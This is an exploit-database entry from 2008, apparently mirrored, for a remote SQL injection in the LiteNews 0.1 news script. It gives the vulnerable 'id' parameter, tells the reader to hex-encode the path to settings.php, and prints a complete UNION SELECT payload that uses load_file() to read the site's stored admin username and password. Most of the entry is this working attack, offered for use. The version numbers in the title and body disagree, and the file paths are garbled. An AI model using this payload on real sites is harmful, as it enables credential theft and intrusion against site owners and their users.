[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : LiteNews <= 0.1 (id) Remote SQL Injection Vulnerability
# Published : 2008-08-05
# Author : Stack
# Previous Title : LiteNews <= 0.1 Insecure Cookie Handling Vulnerability
# Next Title : Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities
litenews-01 <= 1.2 Remote sql injection
# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
# #
#Injection Adress : http://Sitename/litenew//index.php?mode=view&id= code sql
you need to crypt the directory of settings.php with hex for see the user and password in line 16 & 17
C:AppServwwwlitenewsettings.php = 0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870
http://Sitename/litenew//index.php?mode=view&id=-1%20union%20select%201,load_file(0x433A5C417070536572765C7777775C6C6974656E65775C73657474696E67732E706870),3,4,5/*
# www.Syue.com [2008-08-05]